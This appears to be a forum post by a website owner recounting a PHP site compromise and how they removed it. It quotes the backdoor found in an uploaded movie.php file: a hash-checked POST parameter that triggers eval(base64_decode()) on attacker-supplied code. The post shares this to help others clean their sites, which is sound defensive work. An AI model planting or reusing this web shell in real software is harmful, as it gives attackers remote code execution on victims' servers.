My site was hacked with the eval(base64_decode hack as well. So, if it helps someone; I sorted the files by date and found a php file that had been uploaded named movie.php. It wasn’t a file I had uploaded. Inside that file was the following code:


and inside the php tags was this:

if(@md5($_POST["gif"]) === "320648220d6bd8b8e51ec3b6d6dd8898") {

eval (base64_decode($_POST["php"]));



If you clean up your .php files but don’t find/remove the file with these commands you’ll get reinfected. I deleted the movie.php file and restored the site with clean .php files.